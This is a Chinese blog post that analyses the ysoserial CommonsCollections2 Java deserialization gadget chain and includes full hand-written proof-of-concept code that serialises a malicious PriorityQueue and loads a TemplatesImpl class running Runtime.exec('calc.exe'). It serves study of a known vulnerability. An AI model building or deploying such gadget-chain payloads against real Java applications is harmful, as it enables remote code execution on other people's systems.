java反序列化 exp_java反序列化-ysoserial-调试分析总结篇(2)

最新推荐文章于 2023-02-08 11:02:21 发布
最新推荐文章于 2023-02-08 11:02:21 发布
阅读量173 收藏
点赞数
文章标签: java反序列化 exp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32287387/article/details/114622896
版权

前言:

这篇主要分析commonCollections2,调用链如下图所示:

b6a551fde4c1d4298e52e3c847e39c11.png

调用链分析:

分析环境:jdk1.8.0

1fa92b3d5bd5241b2f4b0acf8f796cfc.png

反序列化的入口点为src.zip!/java/util/PriorityQueue.java

38d7cdeb7de606cd591e617084832732.png

此时将会对队列调用siftdown函数,其中队列中包含了两个元素,其中一个即为templatesImpl恶意类

2a85f753c3f5e831d72fe9e9fe87b29d.png

接下来调用siftDownUsingComparator函数

01382357e034ccc6dcbc120d7cc9d23e.png

在这里将调用TransformingComparator的compare函数,在这里就到了新的漏洞触发点,this.transformer.transform(),而这里的this.transformer即为invokerTransformer,

在commoncollections1中第一次调用的是Lazymap的this.factory.transform,而这里是priorityQueue.java的compare里的this.transformer.transform

211ebe8277360aecc226092abe226a76.png

f1299aa675c7c14a51c865e58966578d.png

而invokeTransformer中将反射调用,templatesImple的newTranformer方法,以前分析fastjson1.2.24时候也用的是这个内置的TemplatesImple类,其有getoutputProperties也将调用newTransformer()

1627d6c5f234129d4d70947eab31f18b.png

1adc6ed62d46cee3dc366f555d380dac.png

接着套路思路就是在newTransformer中实例化我们的恶意字节码中包含的类,从而调用其static代码块或者构造方法中的rce代码

ad7462693d38feb939fac705c1881b2c.png

ece259a74dbe8cd9d316b7442ed5a179.png

ysoserial-exp构造

分析完调用链以后看看ysoserial是如何构造payload的

fa4650ebe6253e98e4ca0f45c9aeb4f3.png

首先创建TemplatesImpl实例

9dadf84616ecfb814f92c73751307f52.png

Class.forName加载三个需要用到的类,然后调用重载的TemplatesImpl来创建实例,这里用到的技术是javassist操作类的字节码

aad477cb9d874f05a6ce3cbc77735410.png

接下来要对我们_bytecode字段所要存储的恶意字节码类进行操作,这里首先将两个类放到pool中

bc86108eeec7fdade12ca85dd711dda8.png

bcf9c7cbdb844f243383cb5190a06d58.png

其中SubTransletpaylod就是存放rce代码的类

2d08c816178040f2076fb0b8f2be7b6d.png

接下来从pool中取出要操作的类,来操作其字节码

c5eb2ab74e4cf67c33727ce1e0e8437c.png

接下来该类创建static代码块,并且加入rce的代码,这里的代码可以自定义,读写文件也可以

d8f7e82a4c2e22458ce7d5033340ef84.png

然后给该类重新设置名字,其实这个可以省略,接下来给该类设置父类为tranlet,其实这里也可以不设置,payload类里已经设置好了

dc0159ef8b0f5ff24378f39ad0582b6f.png

之后将rce类的字节码放到_bytecodes属性中,再设置其他依赖属性_name和_tfactory即可返回templatesImpl类

352e6dca65d6d612d07744db5190b96d.png

接着定义需要反射调用的方法,这里首先用tostring进行填充,后面再放入newtransformer,声明要反序列化的队列priorityQueue,容量为2

e182e1c380607895b04806afd06100de.png

然后反射设置invoketransformer的方法为newtransformer来替换原来的tostring,然后再将queue中的两个元素替换成templatesImpl类的实例,从而结束整个构造过程,因此构造分为三步

1.构造用于执行rce的类

2.构造templatesImpl类的实例,将1中的类填充

3.将2中的类填充到priorityqueue队列中,返回obj

手动编写exp:

exp.java

packageCommonCollections2;import javassist.*;importorg.apache.commons.collections4.Transformer;importorg.apache.commons.collections4.comparators.TransformingComparator;importorg.apache.commons.collections4.functors.InvokerTransformer;import java.io.*;importjava.lang.reflect.Field;importjava.util.Comparator;importjava.util.PriorityQueue;importcom.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;public classexp {public static void main(String[] args) throwsClassNotFoundException, NotFoundException, IOException, CannotCompileException, NoSuchFieldException, IllegalAccessException {

TemplatesImpl tmp= newTemplatesImpl();

ClassPool pool=ClassPool.getDefault();

pool.insertClassPath(new ClassClassPath(payload.class));

CtClass clazz= pool.get(payload.class.getName());final byte[] clazzByte =clazz.toBytecode();//_bytecode为private,需要设置可访问

Field _btcode = TemplatesImpl.class.getDeclaredField("_bytecodes");

_btcode.setAccessible(true);

_btcode.set(tmp,new byte[][]{clazzByte});//_name不为空即可

Field _name = TemplatesImpl.class.getDeclaredField("_name");

_name.setAccessible(true);

_name.set(tmp,"tr1ple");//_tfactory可为空

Field _tf = TemplatesImpl.class.getDeclaredField("_tfactory");

_tf.setAccessible(true);

_tf.set(tmp,null);//

//构造priorityqueue对象// PriorityQueue queue = new PriorityQueue(2);

queue.add(1);

queue.add(1);

InvokerTransformer trans= new InvokerTransformer("newTransformer",new Class[0],new Object[0]);//InvokerTransformer trans = new InvokerTransformer("getOutputProperties",new Class[0],new Object[0]); //调用该方法一样的效果//依赖collections4

TransformingComparator com = newTransformingComparator(trans);

Field ComFi= PriorityQueue.class.getDeclaredField("comparator");

ComFi.setAccessible(true);

ComFi.set(queue,com);

Field qu= PriorityQueue.class.getDeclaredField("queue");

qu.setAccessible(true);

Object[] objOutput=(Object[])qu.get(queue);

objOutput[0] =tmp;

objOutput[1] = 1;//序列化

File file;

file= new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commoncollections2.ser");

OutputStream out= newFileOutputStream(file);

ObjectOutputStream obj= newObjectOutputStream(out);

obj.writeObject(queue);

obj.close();

}

}

payload.java

packageCommonCollections2;importcom.sun.org.apache.xalan.internal.xsltc.DOM;importcom.sun.org.apache.xalan.internal.xsltc.TransletException;importcom.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;importcom.sun.org.apache.xml.internal.dtm.DTMAxisIterator;importcom.sun.org.apache.xml.internal.serializer.SerializationHandler;importjava.io.IOException;importjava.io.Serializable;public class payload extends AbstractTranslet implementsSerializable {

{try{

Runtime.getRuntime().exec("calc.exe");

}catch(IOException e) {

e.printStackTrace();

}

}publicpayload(){

System.out.println("tr1ple 2333");

}public void transform(DOM document, SerializationHandler[] handlers) throwsTransletException {

}public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throwsTransletException {

}

}

readObj.java

packageCommonCollections2;import java.io.*;public classreadObj {public static voidmain(String[] args) {try{

FileInputStream fio= new FileInputStream(new File(System.getProperty("user.dir")+"/javasec-ysoserial/src/main/resources/commoncollections2.ser"));

ObjectInputStream obj= newObjectInputStream(fio);

obj.readObject();

obj.close();

}catch(FileNotFoundException e) {

e.printStackTrace();

}catch(IOException e) {

e.printStackTrace();

}catch(ClassNotFoundException e) {

e.printStackTrace();

}

}

}

测试结果:

如下图所示,_bytecode中的类将被实例化,调用static代码块的代码和构造函数中的代码

37ca98e447d55b5c22a4c325a2d09ef7.png

总结:

整个调用链的重点是在对队列元素排序时可以自定义比较器进行转换从而触发反射调用队列元素的成员方法,相对于cc1来说构造感觉更精巧一点,这个内部TemplatesImpl类也是jdk内置的,攻击效果也不受到jdk版本影响,只要cc4.0的依赖存在即可

金尼玛哈
关注
Java反序列化(四)Common Collection 2分析
Vicl1fe的博客
05-23 544
前言 环境 jdk 1.7 Commons Collections 4.0 idea idea创建maven项目,在pom.xml添加即可 <dependency> <groupId>org.apache.commons</groupId> <artifactId>commons-collections4</artifactId> <version>4.0</version> </depen
Weblogic T3 反序列化学习
qq_31065143的博客
08-03 684
Weblogic T3 反序列化学习 前言 最近在公司实习也没有太多事情,就来学习一下Weblogic听好多师傅讲过很多次了。 这里我使用的是ATEAM大哥开源的搭建工具,感谢前人提供的便捷。我这里本来打算在自己电脑上搭建,但是说多了都是泪,m1适配问题。。。。最后还是跑云服务器上进行了搭建。 搭建过程 下载文件 先从GitHub上面拉取项目,拉取之后创建两个文件夹jdks,weblogics。 jdk下载地址: https://www.oracle.com/technetwork/java/javas
Java反序列化攻击
01-21
Java 反序列化攻击漏洞由FoxGlove 的近的一博文爆出,该漏洞可以被黑客利用向服务器上传恶意脚本,或者远程执行命令。   由于目前发现该漏洞存在于 Apache commons-collections, Apache xalan 和 Groovy 包中,也意味着使用了这些包的服务器(目前发现有WebSphere, WebLogic,JBoss),第三方框架(Spring,Groovy),第三方应用(Jenkins),以及依赖于这些服务器,框架或者直接/间接引用这些包的应用都会受到威胁,这样的应用的数量会以百万计。   说到漏洞存在的原因,根本还在于 Java 序列化自身的缺陷,众
java反序列化 exp_java反序列化exp实践
weixin_34125336的博客
02-16 215
这两天很火的java反序列化漏洞,看到乌云大牛已经开始刷分,于是找来实践一波exp来源ysoserial其中weblogic和jenkins提供python脚本,但需自己加载payload. 而对于jboss和websphere则提供了poc的数据包.foxloveseciswinhttp://www.iswin.org/2015/11/13/Apache-CommonsCollections-D...
JAVA反序列化exp及使用方法
热门推荐
乐枕的家
12-09 1万+
这两天很火的java反序列化漏洞,看到乌云大牛已经开始刷分,于是找来实践一波 exp来源ysoserialhttps://github.com/frohoff/ysoserial这个项目针对不同的java产品给出了简单的漏洞利用脚本. 其中weblogic和jenkins提供python脚本,但需自己加载payload. 而对于jboss和websphere则提供了poc的数据包. 更多信息在
序列化与反序列化
Expaner的博客
12-04 273
首先什么是序列化和反序列化? 序列化:把对象转换为字节序列的过程称为对象的序列化。 反序列化:把字节序列恢复为对象的过程称为对象的反序列化。 通俗的将就是在代码运行的时候,我们可以看到很多的对象,可以是一个,也可以是一类对象的集合,很多的对象数据,这些数据中,有些信息我们想让他持久的保存起来,那么这个序列化。就是把内存里面的这些对象给变成一连串的字节描述的过程。常见的就是变成文件 其次什么场...
java反序列化 exp_java反序列化Commons-Collections5分析
weixin_42522400的博客
02-25 121
BadAttributeValueExceptionpackage org.lain.poc;import org.apache.commons.collections.Transformer;import org.apache.commons.collections.functors.ChainedTransformer;import org.apache.commons.collections...
weblogic反序列化之T3协议
snowlyzz的博客
01-16 3325
T3反序列化学习
C3P0反序列化链学习
虚幻私塾
04-21 1680
🚀 优质资源分享 🚀 学习路线指引(点击解锁) 知识定位 人群定位 🧡 Python实战微信订餐小程序 🧡 进阶级 本课程是python flask+微信小程序的完美结合,从项目搭建到腾讯云部署上线,打造一个全栈订餐系统。 💛Python量化交易实战💛 入门级 手把手带你打造一个易扩展、更安全、效率更高的量化交易系统 C3P0 c3p0第一次听闻是用于fastjson的回显上,大佬们总结三种方法,后面两种主要就是用于fastjson和jackjson的回显利用(注入内存马) http
红队专题-漏洞挖掘代码审计-RCE-反序列化
aming小老弟
03-14 1539
TransformedMap⽤于对Java标准数据结构Map做⼀个修饰,被修饰过的Map在添加新的元素时,将可以执⾏⼀个回调。super(map);
Java反序列化漏洞利用工具(全)
09-14
java反序列化漏洞利用工具包含jboss|weblogic,网上其实有很多,但是用别人的工具收30分是不是有点不厚道,所以我用自己的分下载下来,然后以最低分贡献给大家,上次没有审核通过,希望这次可以……
Java反序列化漏洞之Weblogic、Jboss利用之payload生成工具
02-12
weblogic反序列化和jboss反序列化测试payload,仅供运维人员测试漏洞,请勿非法使用,否则后果自负!
最新版ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
07-23
github已经不怎么好下载的,作者已经把文件上传到其他的平台,刚刚使用的时候遇到了一点问题,要将原文件名改正确了之后才能用。
ysoserial-0.0.6-SNAPSHOT-all.jar
12-19
ysoserial-0.0.6 也可自行下载编译 提供个下载链接:https://jitpack.io/com/github/frohoff/ysoserial/master-v0.0.5-gb617b7b-16/ysoserial-master-v0.0.5-gb617b7b-16.jar
shiro反序列化漏洞利用以及exp编写
最新发布
Thunderclap的博客
02-08 676
为了让浏览器或服务器重启后用户不丢失登录状态,Shiro支持将持久化信息序列化并加密后保存在Cookie的rememberMe字段中,下次读取时进行解密再反序列化。但是在Shiro 1.2.4版本之前内置了一个默认且固定的加密Key,导致攻击者可以伪造任意的rememberMe Cookie,进而触发反序列化漏洞。
javaexp的输入_Java输入输出流(转载)
weixin_33522643的博客
02-25 316
看到一超清晰的输入输出流文章,就转载一下,膜拜一.什么是IOJava中I/O操作主要是指使用Java进行输入,输出操作. Java所有的I/O机制都是基于数据流进行输入输出,这些数据流表示了字符或者字节数据的流动序列。Java的I/O流提供了读写数据的标准方法。任何Java中表示数据源的对象都会提供以数据流的方式读写它的数据的方法。Java.io是大多数面向数据流的输入/输出类的主要软件包。此外...
java反序列化 exp_java反序列化-ysoserial-调试分析总结(5)
weixin_34773479的博客
02-25 147
前言:这文章继续分析commonscollections5,由如下调用链可以看到此时最外层的类不是annotationinvoke,也不是priorityqueue了,变成了badattribute该类要求没有配置security manager利用链分析:首先在badAttribute的readObject中,调用了valObj.toString(),其中valObj中存储TiedMapEnt...
java反序列化 exp_JAVA反序列化exp及使用方法
weixin_36038435的博客
02-16 446
这两天很火的java反序列化漏洞,看到乌云大牛已经开始刷分,于是找来实践一波exp来源ysoserialhttps://github.com/frohoff/ysoserial这个项目针对不同的java产品给出了简单的漏洞利用脚本.其中weblogic和jenkins提供python脚本,但需自己加载payload.而对于jboss和websphere则提供了poc的数据包.更多信息在:foxgl...
Java序列化与反序列化工具
SunnyJava的博客
03-20 1726
Java序列化与反序列化工具 /** * * 序列化工具类 * * */ public class SerializeUtil { /** * 日志 */ private static Logger logger = LoggerFactory.getLogger(SerializeUtil.class); /** * 序列化
Java对象序列化与反序列化深度解析
本文将深入探讨Java对象序列化和反序列化的核心概念及其在实际开发中的应用。首先,我们回顾了Java中数据流处理的背景,特别提到使用DataOutputStream对对象属性逐个写入和读取的繁琐过程。为了简化这种操作,Java...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值